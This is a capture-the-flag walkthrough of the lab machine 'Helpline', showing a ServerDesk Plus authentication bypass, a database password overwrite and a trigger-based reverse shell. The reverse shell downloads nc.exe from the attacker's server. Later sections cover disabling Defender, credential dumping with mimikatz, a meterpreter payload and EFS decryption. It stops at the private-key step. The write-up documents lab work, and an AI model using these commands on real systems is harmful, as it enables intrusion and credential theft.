There’s a completely alternative path to Helpline, that involves getting a shell as SYSTEM from ServerDesk Plus. However, because the flag files are encrypted, there’s still some work to do. This is why the root blood came before the user blood. I’ll pick up here, most importantly having found the mobile client vulnerability in SDP. I’ll show an alternative path to SYSTEM shell via the Postgres database as well.

Shell as SYSTEM

SDP Privesc

CVE-2019-10008 /mc

There’s another exploit that was developed by a team working on Helpline (the POC video is clearly against Helpline). I downloaded the script from exploit-db, and I changed the host from localhost to I also had to add # -*- coding: utf-8 -*- as the second line to handle the characters in the authors names.

On running, it dumps out cookies for an admin login:

root@kali# ./cve-2019-10008.py 
User with low priv: guest:guest
User to bypass authentication to: administrator
Getting a session id
Logging in with low privilege user
Captured authenticated cookies.
Captured secondary sessid.
Doing the magic step 1.
Doing the magic step 2.
Captured target session.Set following cookies on your browser.

I’ll take the five lines at the bottom and set each of those as cookies using the cookie plugin in my browser. When I refresh on the root url, I’m logged in as admin:


Looking at the script, it’s basically taking advatnage of /mc. In SDP, visiting /mc takes the user to the mobile client login. It is a different app, but with some shared architecture. This path presents a different login page:


If I try to log in with the default administrator creds on the main page or the mobile page, it fails. However, if I log in as guest, then switch to /mc, then logout, then give administrator / anything, I’ll be logged in as admin, even when I switch back to the non-mobile site:

Change administrator Password

An alternative to the two exploits above is to use my shell as alice and postgres access to change the administrator password for SDP.

The database here is a mess. To get a list of usernames and password hashes, I’ll do a join on the aaapassword and aaalogin tables:

PS helpline\alice@HELPLINE bin> ./psql.exe -h -p 65432 -U postgres -w -d servicedesk -c "select aaapassword.password_id, aaalogin.name from aaalogin, aaapassword where aaalogin.login_id = aaapassword.password_id "
 password_id |     name      
           1 | guest
           2 | administrator
         302 | luis_21465
         303 | zachary_33258
         601 | stephen
         602 | fiona
         603 | mary
         604 | anne
(8 rows)

All I need to do is overwrite the password entries for id 2. The aaapassword table currently shows:

PS helpline\alice@HELPLINE bin> ./psql.exe -h -p 65432 -U postgres -w -d servicedesk -c "select * from aaapassword;"
 password_id |                           password                           | algorithm |             salt              | passwdprofile_id | passwdrule_id |  createdtime  | factor 
           1 | $2a$12$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG | bcrypt    | $2a$12$6VGARvoc/dRcRxOckr6Wmu |                2 |             1 | 1545350288006 |     12
         302 | $2a$12$2WVZ7E/MbRgTqdkWCOrJP.qWCHcsa37pnlK.0OyHKfd4lyDweMtki | bcrypt    | $2a$12$2WVZ7E/MbRgTqdkWCOrJP. |                2 |             1 | 1545428506907 |       
         303 | $2a$12$Em8etmNxTinGuub6rFdSwubakrWy9BEskUgq4uelRqAfAXIUpZrmm | bcrypt    | $2a$12$Em8etmNxTinGuub6rFdSwu |                2 |             1 | 1545428808687 |       
           2 | $2a$12$hmG6bvLokc9jNMYqoCpw2Op5ji7CWeBssq1xeCmU.ln/yh0OBPuDa | bcrypt    | $2a$12$hmG6bvLokc9jNMYqoCpw2O |                2 |             1 | 1545428960671 |     12
         601 | $2a$12$6sw6V2qSWANP.QxLarjHKOn3tntRUthhCrwt7NWleMIcIN24Clyyu | bcrypt    | $2a$12$6sw6V2qSWANP.QxLarjHKO |                2 |             1 | 1545514864248 |       
         602 | $2a$12$X2lV6Bm7MQomIunT5C651.PiqAq6IyATiYssprUbNgX3vJkxNCCDa | bcrypt    | $2a$12$X2lV6Bm7MQomIunT5C651. |                2 |             1 | 1545515091170 |       
         603 | $2a$12$gFZpYK8alTDXHPaFlK51XeBCxnvqSShZ5IO/T5GGliBGfAOxwHtHu | bcrypt    | $2a$12$gFZpYK8alTDXHPaFlK51Xe |                2 |             1 | 1545516114589 |       
         604 | $2a$12$4.iNcgnAd8Kyy7q/mgkTFuI14KDBEpMhY/RyzCE4TEMsvd.B9jHuy | bcrypt    | $2a$12$4.iNcgnAd8Kyy7q/mgkTFu |                2 |             1 | 1545517215465 |       
(8 rows)

I could go setting my own password, but it seems easier just to copy one I already know, like guest. My first attempt failed:

PS helpline\alice@HELPLINE bin> ./psql.exe -h -p 65432 -U postgres -w -d servicedesk -c "update aaapassword set password='$2a$12$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG', salt='$2a$12$6VGARvoc/dRcRxOckr6Wmu' where password_id = 2;"
PS helpline\alice@HELPLINE bin> ./psql.exe -h -p 65432 -U postgres -w -d servicedesk -c "select * from aaapassword where password_id = 2;"
 password_id |                   password                    | algorithm |      salt      | passwdprofile_id | passwdrule_id |  createdtime  | factor 
           2 | /dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG | bcrypt    | /dRcRxOckr6Wmu |                2 |             1 | 1545428960671 |     12
(1 row)

$ has meaning in postgres, and therefore I’ve got to figure out how to escape it. This was trickier than I expected (thanks to jkr and snowscan for tips here). One way to do it is use a unicode string, replacing '$2a$12$6VGARvoc/dRcRxOckr6Wmu' with U&'\00242a\002412\00246VGARvoc/dRcRxOckr6Wmu'. Another is to use backtick to escape, so '`$2a`$12`$6VGARvoc/dRcRxOckr6Wmu'.

I can rerun and it works:

PS helpline\alice@HELPLINE bin> ./psql.exe -h -p 65432 -U postgres -w -d servicedesk -c "update aaapassword set password='`$2a`$12`$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG', salt='`$2a`$12`$6VGARvoc/dRcRxOckr6Wmu' where password_id = 2;"

PS helpline\alice@HELPLINE bin> ./psql.exe -h -p 65432 -U postgres -w -d servicedesk -c "select password_id, password, salt from aaapassword where password_id = 1 or password_id = 2;"
 password_id |                           password                           |             salt              
           1 | $2a$12$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG | $2a$12$6VGARvoc/dRcRxOckr6Wmu
           2 | $2a$12$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG | $2a$12$6VGARvoc/dRcRxOckr6Wmu
(2 rows)

Now I’m able to login using administrator / guest.

Create Trigger

With admin access to SDP, I can access everything I could access before as guest. But now I can also use triggers to get a shell.

On the “Admin” page, there’s a link to “Custom Triggers”. I’ll click “Add New Action”, and fill out the form:


My script file to run is:

cmd /c powershell iwr -uri -outfile c:\windows\system32\spool\drivers\color\nc.exe; c:\windows\system32\spool\drivers\color\nc.exe -e cmd.exe 443

Now I’ll go back to the main window, and create a new high priority ticket. Once it saves, I see the request for nc on my python web server: - - [12/Aug/2019 16:52:18] "GET /nc64.exe HTTP/1.1" 200 -

And then I have a shell as SYSTEM:

root@kali# rlwrap nc -lnvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.

nt authority\system

Get administrator Password


As system, it may seem like this box is over, but it’s not. When I go to get root.txt, I can’t access it:

c:\Users\Administrator\Desktop>type root.txt
Access is denied.

I can use cipher to see more details about why:

c:\Users\Administrator\Desktop>cipher /c root.txt
cipher /c root.txt

 Listing c:\Users\Administrator\Desktop\
 New files added to this directory will not be encrypted.

E root.txt
  Compatibility Level:
    Windows XP/Server 2003

  Users who can decrypt:
    HELPLINE\Administrator [Administrator(Administrator@HELPLINE)]
    Certificate thumbprint: FB15 4575 993A 250F E826 DBAC 79EF 26C2 11CB 77B3 

  No recovery certificate found.

  Key information cannot be retrieved.

The specified file could not be decrypted.

The file is encrypted with EFS, and since SYSTEM doesn’t know the password for administrator, it can’t access the file. It actually turns out that all of the critical files on Helpline are encrypted with EFS.

Upload Mimikatz

I’ll need mimikatz to get the necessary bits to decrypt the file. I’ll download the latest release and get the x64 exe out of the zip.

Now I’ll bring it to Helpline:

c:\Windows\System32\spool\drivers\color>powershell iwr -uri -outfile m.exe

c:\Windows\System32\spool\drivers\color>dir m.exe
 Volume in drive C has no label.
 Volume Serial Number is D258-5C3B

 Directory of c:\Windows\System32\spool\drivers\color

08/12/2019  09:06 PM         1,011,864 m.exe
               1 File(s)      1,011,864 bytes
               0 Dir(s)   5,844,955,136 bytes free

But when I try to run it, it’s gone:

The system cannot execute the specified program.

Defender is quarantining it. Since I’m SYSTEM, I’ll just disable Defender:

c:\>powershell Set-MpPreference -DisableRealtimeMonitoring $true

Now it can run:

c:\Windows\System32\spool\drivers\color>powershell iwr -uri -outfile m.exe


  .#####.   mimikatz 2.2.0 (x64) #18362 Jul 20 2019 22:57:37
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # 

Fix Issue With Version

The first thing I wanted to do was dump out passwords. If I can find the admin password, I could just connect with that. I started to run sekurlsa::logonpasswords, but it failed:

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import  

Some googling shows this is a known and recent issue. I grabbed one version older from the releases page, uploaded it as m2.exe, and it works:

mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 212681 (00000000:00033ec9)
Session           : Interactive from 1
User Name         : leo
Domain            : HELPLINE
Logon Server      : HELPLINE
Logon Time        : 8/12/2019 6:58:42 PM
SID               : S-1-5-21-3107372852-1132949149-763516304-1009
        msv :
         [00000003] Primary
         * Username : leo
         * Domain   : HELPLINE
         * NTLM     : 60b05a66232e2eb067b973c889b615dd
         * SHA1     : 68c6608505d867762620a64dfd354685da822bf2
        tspkg :
        wdigest :
         * Username : leo
         * Domain   : HELPLINE
         * Password : (null)
        kerberos :
         * Username : leo
         * Domain   : HELPLINE
         * Password : (null)
        ssp :
        credman :

If I’m lucky enough to be doing this box at the same time as someone else who has taken the intended path, there’s likely administrator credentials also in memory, and I can proceed to decrypt root.txt. In that case, I’d see the following in the results from the previous command:

Authentication Id : 0 ; 3468015 (00000000:0034eaef)
Session           : NetworkCleartext from 0
User Name         : Administrator
Domain            : HELPLINE
Logon Server      : HELPLINE
Logon Time        : 8/17/2019 3:31:21 PM
SID               : S-1-5-21-3107372852-1132949149-763516304-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : HELPLINE
         * NTLM     : d5312b245d641b3fae0d07493a022622
         * SHA1     : 6148ba9dcbb1567b1c83606747dc7cfed0243dde
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : HELPLINE
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : HELPLINE
         * Password : (null)
        ssp :
        credman :

But on a fresh box, there’s only leo’s sha1 here. I could dump hashes from the registry using lsadump::sam, but those would only be NTLM hashes, and won’t work on a local account.

More Enumeration

Some basic enumeration of the various user directories does reveal admin-pass.xml on leo’s desktop.

C:\Users\leo\Desktop>dir /b

I still can’t access it as SYSTEM:

C:\Users\leo\Desktop>type admin-pass.xml
type admin-pass.xml
Access is denied.

That’s an interesting file, and I have leo’s sha1 from sekurlsa::logonpasswords, which means that the user is logged in in some sense.

Load Meterpreter

At this point, I’m going to take a shot at reading the password file without decrypting it, by injecting it a process running as leo. Since leo’s info was in the logonpasswords, there’s a chance there’s a process running as leo.

I’ll build a payload with msfvenom:

root@kali# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe -o met_10.10.14.14-4444.exe                                                                
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: met_10.10.14.14-4444.exe

I’ll share it over smb and run it:

C:\>net use \\\share /u:df df
The command completed successfully.

And I get a session in metasploit:

msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on
[*] Sending stage (206403 bytes) to
[*] Meterpreter session 1 opened ( -> at 2019-08-17 10:03:06 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Inject into leo

There’s a few processes running as leo, including explorer.exe:

meterpreter > ps -U leo
Filtering on user 'leo'

Process List

 PID   PPID  Name                     Arch  Session  User          Path
 ---   ----  ----                     ----  -------  ----          ----
 608   700   conhost.exe              x64   1        HELPLINE\leo  C:\Windows\System32\conhost.exe
 700   5280  powershell.exe           x64   1        HELPLINE\leo  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe                                                                                               
 2568  836   ctfmon.exe               x64   1        HELPLINE\leo  C:\Windows\System32\ctfmon.exe
 4700  1796  sihost.exe               x64   1        HELPLINE\leo  C:\Windows\System32\sihost.exe
 4720  596   svchost.exe              x64   1        HELPLINE\leo  C:\Windows\System32\svchost.exe
 4756  596   svchost.exe              x64   1        HELPLINE\leo  C:\Windows\System32\svchost.exe
 4812  1360  taskhostw.exe            x64   1        HELPLINE\leo  C:\Windows\System32\taskhostw.exe
 5280  5260  explorer.exe             x64   1        HELPLINE\leo  C:\Windows\explorer.exe
 5296  5280  vmtoolsd.exe             x64   1        HELPLINE\leo  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe                                                                                                       
 5524  740   ShellExperienceHost.exe  x64   1        HELPLINE\leo  C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe                                                                         
 5620  740   SearchUI.exe             x64   1        HELPLINE\leo  C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe                                                                              
 5780  740   RuntimeBroker.exe        x64   1        HELPLINE\leo  C:\Windows\System32\RuntimeBroker.exe
 5852  740   RuntimeBroker.exe        x64   1        HELPLINE\leo  C:\Windows\System32\RuntimeBroker.exe
 6076  740   RuntimeBroker.exe        x64   1        HELPLINE\leo  C:\Windows\System32\RuntimeBroker.exe

I’ll migrate into explorer:

meterpreter > migrate 5280
[*] Migrating from 4192 to 5280...
[*] Migration completed successfully.

Now I’ll load powershell and get a shell as leo:

meterpreter > load powershell 
Loading extension powershell...Success.
meterpreter > powershell_shell 
PS > whoami

Now I can read admin-pass.xml:

PS > type admin-pass.xml

Get Password

Now I’ll get the password from that file:

PS > $s = cat admin-pass.xml
PS > $ss = Convertto-securestring -string $s
PS > $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist "administrator", $ss
PS > $cred.GetNetworkCredential().password

Read root.txt

Via PowerShell

The easiest way forward is to use the credential ($cred) I created in the last step to run commands:

PS > Invoke-Command -ScriptBlock { whoami } -Credential $cred -Computer localhost 

I can read the flag:

PS > Invoke-Command -ScriptBlock { type C:\users\administrator\desktop\root.txt } -Credential $cred -Computer localhost
ERROR: Access to the path 'C:\Users\Administrator\desktop\root.txt' is denied.
ERROR:     + CategoryInfo          : PermissionDenied: (C:\Users\Administrator\desktop\root.txt:String) [Get-Content], Unauth
ERROR:    orizedAccessException
ERROR:     + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
ERROR:     + PSComputerName        : localhost

Not around the EFS… but if I use -auth CredSSP just like over WinRM:

PS > Invoke-Command -ScriptBlock { type C:\users\administrator\desktop\root.txt } -Credential $cred -Computer localhost -auth credssp

Decrypt EFS


The more interesting path is to decrypt the EFS file. I’m going to follow this guide from the Mimikatz GitHub.

Get The Certificate

I’ll start with the output of cipher run above. That tells me that certificate thumbprint is: FB15 4575 993A 250F E826 DBAC 79EF 26C2 11CB 77B3. That means according to the guide, I should find it in C:\Users\administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, and I do:

C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates>dir /a /b

Note that I’m using dir /a, as all of these files and directories are hidden, and it will look like there’s nothing there without the /a. I’m also using /b to give compressed output.

Now I can use minikatz to get info on the certificate:

mimikatz # crypto::system /file:"C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\FB154575993A250FE826DBAC79EF26C211CB77B3" /export

* File: 'C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\FB154575993A250FE826DBAC79EF26C211CB77B3'
  Provider info:
        Key Container  : 3dd3e213-bce6-4acb-808c-a1b3227ecbde
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Provider type  : RSA_FULL (1)
        Type           : AT_KEYEXCHANGE (0x00000001)
        Flags          : 00000000
        Param (todo)   : 00000000 / 00000000

[0003/1] SHA1_HASH_PROP_ID
[0020/1] cert_file_element
  Data: 30820314308201fca0030201020210194a705262024cab4094533eed3561f8300d06092a864886f70d01010505003018311630140603550403130d41646d696e6973747261746f723020170d3138313232333139353533345a180f32313138313132393139353533345a3018311630140603550403130d41646d696e6973747261746f7230820122300d06092a864886f70d01010105000382010f003082010a0282010100c33c505d59ea1dd47306b84f92833d5b33f9c6422a546368176de4b3dbbd29730192b43273ad98f3719d657176d7586e841bcb177d5e3275f092155c7c422180964a024d5d982982610860aec5525e58523d7633512b264de41a46ee7cd89c26a5a013f5a9fb1eed992f98c0ab5be241b1c796e74ba5924b7d074f15ee67534e089b86bc43d670832404fe63a9cdf5ccf84532ef8bf800597de0f4553785e516f91255be7cae47ba99cce2c1d2bda076074da0e66de4ec9e7bd4f67b49bcf896ba8f20554eeac4f28b0588378fd435dba1d4d5bd2667fa79a47835b9c834dbc0d65b067dd09ac49f31c5737665af8e3a66514135b3e5d482a7e66e7111b689390203010001a358305630150603551d25040e300c060a2b0601040182370a030430320603551d11042b3029a027060a2b060104018237140203a0190c1741646d696e6973747261746f724048454c504c494e450030090603551d1304023000300d06092a864886f70d01010505000382010100967ac2ac65fe0cb96583240be69e81173546a6d817951e338aa58d7c5e8f2b96c2af6c2a758800c086eb8cb55a525c4f85af2311ac6e655a7a071f719b5a776de45edc699bbd47bcb9b235595990bcf518d20635d297aa576b97932248414d2f1ac849d525379065f5f4c640cc9ebac0a2c240263c08ef4c54e9c9a6b08dd0cf4eb78e1d5e7341b1a950045c2d3233554aeff1294d300e0a5cf75eaf832b76c0fa96e7e3a4c28ddb639d366da1e0f3af91d678c22acd980890af1372f37954d503e133261a078a161d9cba85dd28b2ef0eebffb1b8ae0980c7978021b01fcf0dc5f282ab67be4540418b05a627b6b34b06bf5283b00efb3a32ae651e132eb3d3                                       
  Saved to file: FB154575993A250FE826DBAC79EF26C211CB77B3.der

I’ll need that certificate later. I’ll also continue knowing that the Key Container ID is 3dd3e213-bce6-4acb-808c-a1b3227ecbde.

About The Private Key

Now I’ll go digging into C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA to find the containers. There’s only one sid:

C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA>dir /a /b

In that dir, there is only one potential key container file:

C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500>dir /a /b

I’ll use mimikatz to get details. I want to make sure the pUniqueName matches the Key Container ID from above, and it does:

mimikatz # dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85"
**KEY (capi)**
  dwVersion          : 00000002 - 2
  dwUniqueNameLen    : 00000025 - 37
  dwSiPublicKeyLen   : 00000000 - 0
  dwSiPrivateKeyLen  : 00000000 - 0
  dwExPublicKeyLen   : 0000011c - 284
  dwExPrivateKeyLen  : 00000650 - 1616
  dwHashLen          : 00000014 - 20
  dwSiExportFlagLen  : 00000000 - 0
  dwExExportFlagLen  : 000000fc - 252
  pUniqueName        : 3dd3e213-bce6-4acb-808c-a1b3227ecbde
  pHash              : 0000000000000000000000000000000000000000
  pSiPublicKey       :
  pSiPrivateKey      :
  pSiExportFlag      :
  pExPublicKey       : 525341310801000000080000ff000000010001003989b611716ee6a782d4e5b3354151663a8eaf657673c5319fc49ad07d065bd6c0db34c8b93578a479fa6726bdd5d4a1db35d48f3788058bf2c4ea4e55208fba96f8bc497bf6d47b9eece46de6a04d0776a0bdd2c1e2cc99ba47ae7cbe5512f916e5853755f4e07d5900f88bef3245f8ccf5cda963fe04248370d643bc869b084e5367ee154f077d4b92a54be796c7b141e25babc0982f99ed1efba9f513a0a5269cd87cee461ae44d262b5133763d52585e52c5ae6008618229985d4d024a968021427c5c1592f075325e7d17cb1b846e58d77671659d71f398ad7332b492017329bddbb3e46d176863542a42c6f9335b3d83924fb80673d41dea595d503cc30000000000000000                                                                                                                                                                        
  pExPrivateKey      :
    dwVersion          : 00000001 - 1
    guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
    dwMasterKeyVersion : 00000001 - 1
    guidMasterKey      : {9e78687d-d881-4ccb-8bd8-bc0a19608687}
    dwFlags            : 00000000 - 0 ()
    dwDescriptionLen   : 0000002c - 44
    szDescription      : CryptoAPI Private Key
    algCrypt           : 00006610 - 26128 (CALG_AES_256)
    dwAlgCryptLen      : 00000100 - 256
    dwSaltLen          : 00000020 - 32
    pbSalt             : 636d94346c64834703f72ac073d477dfbf956804655e17c6f37e2865deb4d1f9
    dwHmacKeyLen       : 00000000 - 0
    pbHmackKey         :
    algHash            : 0000800e - 32782 (CALG_SHA_512)
    dwAlgHashLen       : 00000200 - 512
    dwHmac2KeyLen      : 00000020 - 32
    pbHmack2Key        : 168bc09c733e929c54210737b2a287fbbbb4addfd2fd9e9de5768ed1a03162e4
    dwDataLen          : 00000550 - 1360
    pbData             : 4ea3c71a9d7383df26037dbfe5e4cdf6fc0ba47c7cb72f319b6cd6480ced3ff383beb0987aff0f2fb7d407fc1c03356fec5abb8679b314d77442b61e60fb6a26e05bdfb45c8766f6a631ef9157acd07801d5dc11f0bb154c67667386e060ee26d23b2b8eabdc7704a4deb978b54c2ced8186a2f0f6e2dfcae00373ccebb41d0328fa8a56c10bbbdaac2d65e9aca68c96f8bda7fb813104e5c0c8c0c1098c53861a39d4e5ce9e856f07baff3373dec17e58998568493519d6d7fb09398b1370f2c90a248d85bf9a6b887f9c62efd190ccd10019fe4a99482df2fc6ca12324fc1f4c13da2ff8501ec50d8c04ba450b3e8542af7d5ad22d50d17c84ea47a181dc945ad481ba73089b453667cba5ab7edf2252bf002c36a6b68640c4feed5af84a095006445c54a546693d49fe4dd2744da7185c17777bc43c98936999011114efcc0052823ee5beafcd67ae82b6be5ed01233a7bcc61ffd13c420fc132d4be62163f4c3f33667f9eb569f0711258b6eea3f989c36f0250b7d0a8e704583546e31f8a6edfdc10fa175df1c2b8b5081cb0b5555c6d59c88bea128e574d6853c2f14bc56ecee49ac526c47b54cbf0eec70b80bde4dd9f29aa813413250c819d2a7dcfeec03abcb2e664b30e0c9b8ef1657b80d450aafe6de81dd6df8880591c6d3025f7395ba86a9b735155143e0628bdef1de7ca1a3d3dd4ffde8fb32570a92d0c87ad84706342fe3ac35d3961c780fa760e67c713a5440708cefc08f77a4d2c23e89004343f6964aa3322ce895430b1e4a33e2ab20ad5526cbd505344bc67651ff2f5b48d9dd01de8c92b7d9a56ba4cf4f1ea61276fe2daa6bc804148f38a565d2a54c20e090a03c5eb25cde18885f8153bd31a7005d18c9913387942c34ce6c9060e551dadb9be171f2a3decb46ba10fa574bededf8c5e69cea4cdfaec894f447121dff6e2fafb21ab55b92419048eb5fa39002eaa24ff88f3e08a3f23684a5d1508be1c1d3a55e73a263c0ea1a15a8c66b2b34354ab197a7f3ca14fe036959f32b27a96d54c0d978adf27ae80702c65e7eb82da6ab112fc493410242c0734d0f84641a2aa12ddf34d395eba1f26dc5cf0fde8ad7954a5444b30fc0ad1240bb198ce23a1a356fef4bb8482b839f9b0584b90b321d3cc73e37b2f6cff710c83275afdea0a9bbcd1f472bd7b6935a6ced7aea0ae0017c8d1dacc93a8d3b0206d915c4b19369529bc96104fc055ff5078fa1c5f1dd240320549bfaf8e2ec2da18c73259182a0a3964794ff93e22c6a4fae51991a0582d09b67f79331ffe9c020db6742c6b9bde98abf18c789d19246584a90b8584ac5e46c2109afbe024e4a6a273781898520c35e566c42675c7368baa892c9cabf1ec6c2c969931d1a1987a4f622d135dfac29b11623d2560147c54257de3397f3c2e479070990deb55f197359d5282b0c59aee9c32feb16b0eb405d98bf15df04de0ec93b0adc6f827de6e81626743bed95cbc816161a11c324d7118429c2e1b923293b22254a076a33ee4e68af7e1d15b66712139fd39902548ec23834be55e1c1133ffd7ed6e3b78c003cc612cf0408acf84e8e02cf983425e9830a07982163f997785fa0ad4c088b76edfaa86e6a1ab0c315b317578f70fff21a88178153c2d7663fdc5fb5267d48998f577ca94aa538a38a0acde37d52af53d629a2f55f02f46460bd4fce7a34a750798be6b32709fa673032b27aa14d068a491a060072779c6e719621ac42f3692d91fc975bce8ac32fe81e94525b05a251e906043d8f934ebcbf49a8947ab9bbb8d4a7fc653fab9543d0c22628bb9513390656cbb9f41a103103ed0485103b3f8f75154279bae4d5de5dfb023875bf8c610435ee550b155b3052447188c0530a49399c26b4e1a57078fcbaaf2d2eed0621d2e3ff56
    dwSignLen          : 00000040 - 64
    pbSign             : 772ca28a76efbef47c88f050da7814232bbb7d72d8692d02f85a9046d0b57da2cf94b455a2c9618811b07146b26242128caed8bace68bca36e0771e05564b0dd

  pExExportFlag      :
    dwVersion          : 00000001 - 1
    guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
    dwMasterKeyVersion : 00000001 - 1
    guidMasterKey      : {9e78687d-d881-4ccb-8bd8-bc0a19608687}
    dwFlags            : 00000000 - 0 ()
    dwDescriptionLen   : 00000018 - 24
    szDescription      : Export Flag
    algCrypt           : 00006610 - 26128 (CALG_AES_256)
    dwAlgCryptLen      : 00000100 - 256
    dwSaltLen          : 00000020 - 32
    pbSalt             : d4a8381b8847c218242b61555a4d0d78b68659dd782e674408187bf52f7d171b
    dwHmacKeyLen       : 00000000 - 0
    pbHmackKey         :
    algHash            : 0000800e - 32782 (CALG_SHA_512)
    dwAlgHashLen       : 00000200 - 512
    dwHmac2KeyLen      : 00000020 - 32
    pbHmack2Key        : b6a835d975bb90aae24e128640f5459fad3cb4f418ea176acd83b25ac5828053
    dwDataLen          : 00000010 - 16
    pbData             : 07aecb012bb7f55c03ada7069f49df4c
    dwSignLen          : 00000040 - 64
    pbSign             : 1a7d25a9be8bbe328ae80b35be2d88ca63acbe4716724ac11d3c95de841e684bf56ebbafccc60fb9c07fc0c481abcd10e37c8de73e0c4905a596eed2ece22fcb

From that, I’ll also see the private key is encrypted with the masterkey 9e78687d-d881-4ccb-8bd8-bc0a19608687.

Decrypt The masterkey

I’ll use that guid to find the encrypted masterkey in C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-3107372852-1132949149-763516304-500:

C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-3107372852-1132949149-763516304-500>dir /a
dir /a
 Volume in drive C has no label.
 Volume Serial Number is D258-5C3B

 Directory of C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-3107372852-1132949149-763516304-500

12/23/2018  08:54 PM    <DIR>          .
12/23/2018  08:54 PM    <DIR>          ..
12/20/2018  10:07 PM               468 61349c38-5618-45f3-8d0d-8f3b24e3e718
12/23/2018  08:54 PM               468 9e78687d-d881-4ccb-8bd8-bc0a19608687
12/23/2018  08:54 PM                24 Preferred
               3 File(s)            960 bytes
               2 Dir(s)   5,778,624,512 bytes free

I can use mimikatz with the password to decrypt the key:

mimikatz # dpapi::masterkey /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-3107372852-1132949149-763516304-500\9e78687d-d881-4ccb-8bd8-bc0a19608687" /password:mb@letmein@SERVER#acc
  dwVersion          : 00000002 - 2
  szGuid             : {9e78687d-d881-4ccb-8bd8-bc0a19608687}
  dwFlags            : 00000005 - 5
  dwMasterKeyLen     : 000000b0 - 176
  dwBackupKeyLen     : 00000090 - 144
  dwCredHistLen      : 00000014 - 20
  dwDomainKeyLen     : 00000000 - 0
    dwVersion        : 00000002 - 2
    salt             : 98767ea007dc468e6bc59c9ff8e666f5
    rounds           : 00001f40 - 8000
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : 7a25ca58aab56dcc924214a1076381e3aabe1ddfc3504fee7c0a07ab67375c1d892a54cf5bb4470079118dbb4534dcc73f180733c614d767b71709d75f361e7cf156113b2ea8841ccf08bdba2d8ac22ef1920cbf922f36fc44671e56438758dc03c481ee654361521539bef11213bd3bf0a8d76efa9e35722578111b21700c773af7224635b6708e127edcd3a9ab245a

    dwVersion        : 00000002 - 2
    salt             : df20ce5c344410a535b5307e6e4c095f
    rounds           : 00001f40 - 8000
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : 3e75b3e7d8dc0f04b7dc992409af01211ad82095847031dbf57ffddafce991b90f9c06854c8a40523eb10ad6f712431b986717461b4c66ab3210189e00ba760cc3ea29c352e9fcf4d2827005a886d1d6d854d76ec5b9286d0acaba0326ae67d9e88762698f136bc8bf7e88a8ba1e5c21                        

    dwVersion        : 00000003 - 3
    guid             : {712edeb8-1bb0-40a4-892c-5b3618e32d3f}

Auto SID from path seems to be: S-1-5-21-3107372852-1132949149-763516304-500

[masterkey] with password: mb@letmein@SERVER#acc (normal user)
  key : 8ed6519c4d09a506504c4f611203bea8979a385f8a444fe57b5d2256ee1e4eb34392a141f502cd9aeea8d2187c2525c3ae998dc3cebad81cc4e41dbb6bc65fa8
  sha1: b18974052cb509a86a008869fd95388550678184

Now I have the masterkey (and it’s sha1).

Decrypt The Private Key

